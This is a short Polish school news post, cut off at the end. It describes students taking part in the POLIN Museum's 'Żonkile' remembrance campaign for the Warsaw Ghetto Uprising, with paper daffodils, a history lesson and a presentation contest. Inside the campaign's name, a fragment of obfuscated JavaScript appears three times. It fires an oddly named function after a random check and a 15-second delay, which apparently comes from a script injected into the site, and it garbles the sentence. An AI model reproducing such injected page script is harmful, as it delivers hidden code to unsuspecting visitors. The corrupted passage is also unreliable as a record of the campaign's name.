Akcja społeczno – edukacyjna „Żonkile”

W 72 rocznicę Powstania w Getcie Warszawskim, Muzeum POLIN zorganizowało akcję społeczno-edukacyjną „dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}Żdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}onkiledom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}”. Do akcji przyłączyli się uczniowie naszej szkoły. Koordynatorem działań była nauczycielka historii Katarzyna Dyja.

W związku akcją uczniowie wykonali papierowe żonkile – symbol pamięci o bohaterach powstania z 19 kwietnia 1943 roku. Przeprowadzono lekcję historii „Dymy nad gettem” – Polacy wobec walki Żydów w getcie warszawskim. Stworzono gazetkę tematyczną. W ramach konkursu szkolnego uczniowie wykonali prezentacje multimedialne pt. „Powstanie w Getcie Warszawskim”.

Realizacja projektu miała miejsce dzięki wsparciu udzielonemu z funduszy norweskich i EOG przez Isl